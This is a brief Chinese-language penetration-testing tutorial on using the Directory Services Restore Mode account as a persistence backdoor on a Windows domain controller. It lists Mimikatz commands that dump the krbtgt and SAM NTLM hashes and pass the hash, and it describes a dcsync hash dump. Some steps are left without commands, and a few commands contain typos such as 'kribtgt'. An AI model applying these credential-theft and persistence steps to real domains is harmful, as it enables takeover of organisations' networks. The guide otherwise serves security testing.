DSRM后门:
目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器域控制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。活动目录安装后,安装向导提示管理员选择一个DSRM密码。有了密码,管理员可以防护数据库后门,避免之后出问题。但是它不提供访问域或任何服务。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。
在渗透测试中,可以使用DSRM对域环境进行持久化操作。适用版本为windows server2008(需安装KB961320才可以使用指定域账号的密码对DSRM的密码进行同步)及以后的版本,windows server2003不能使用此方法。
每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。
一、获取krbtgt的NTLM hash
在Mimikatz中输入:
privilege::debug
lsadump::lsa /patch /name:kribtgt
二、获取DSRM账号的NTLM hash
token::elevate
lsadump::sam
三、将DSRM账号和krbtgt的NTLM hash同步
四、查看DSRM的NTLM hash是否同步成功
当前DSRM的NTLM和krbtgt hash一致
五、修改DSRM的登录方式
如果要对使用DSRM账号通过网络登录域登录器,需要将该VALUE改为2
六、使用DSRM账号通过网络远程登录域控制器
使用mimikatz进行哈希传递,在域成员机器的管理员模式下打开MIMIKATZ,输入:
privilege::debug
sekurlsa::pth /domain:DC /user:Administrator /ntlm:[目标的hash]
七、使用mimikatz的dcysnc功能远程转储krbrgt的NTLM的hsah
哈希传递完成后,会弹出一个命令行窗口,在该窗口打开Mimikatz,输入如下命令
使用dcsync功能远程转储散列值